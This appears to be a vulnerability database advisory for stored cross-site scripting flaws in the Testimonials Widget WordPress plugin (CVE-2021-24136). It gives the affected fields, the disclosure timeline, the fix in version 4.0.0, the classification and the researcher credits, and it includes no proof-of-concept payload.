WordPress Plugin Vulnerabilities

Testimonials Widget < 4.0.0 - Multiple Authenticated Stored XSS

Description

Multiple cross-site scripting vulnerabilities in Testimonials Widget 3.5.1 and lower allow remote attackers to inject arbitrary Javascript code or HTML via the below parameters:

- Author
- Job Title
- Location
- Company
- Email
- URL

Successful exploitation of this vulnerability would allow an authenticated medium-privileged user (contributor+) to inject arbitrary Javascript code or HTML. The script is executed for all users visiting the website. Note: testimonials added via by a contributor, go through a manual review process.

May 9th, 2020 - Confirmed & Escalated to WP Plugins Team
May 11th, 2020 - WP Plugins Team Investigating
July 3rd, 2020 - No updates, releasing.
July 12th, 2020 - v4.0.0 released, fixing the issues.

Proof of Concept

Affects Plugins

Plugin icon
testimonials-widget
Fixed in 4.0.0

References

CVE
CVE-2021-24136

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
5.5 (medium)

Miscellaneous

Original Researcher
Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Submitter
Nguyen Anh Tien
Submitter website
https://research.sun-asterisk.com/en
Verified
Yes
WPVDB ID
537ee410-3833-4e88-9d4a-ee3c72b44ca1

Timeline

Publicly Published
2020-07-03 (about 5 years ago)
Added
2020-07-03 (about 5 years ago)
Last Updated
2021-01-23 (about 4 years ago)

Other

Published
Title
Published
2023-02-13
Title
Fancy Comments WordPress < 1.2.11 - Contributor+ Stored XSS
Published
2024-12-11
Title
BP Email Assign Templates < 1.6 - Reflected XSS
Published
2021-02-14
Title
Zebra_Form Library <= 2.9.8 - Reflected Cross-Site Scripting (XSS)
Published
2024-03-11
Title
Beaver Builder < 2.7.4.5 - Contributor+ Stored Cross-Site Scripting via heading tag
Published
2016-11-10
Title
WP Google Maps <= 6.3.14 - Authenticated Stored Cross-Site Scripting (XSS) via CSRF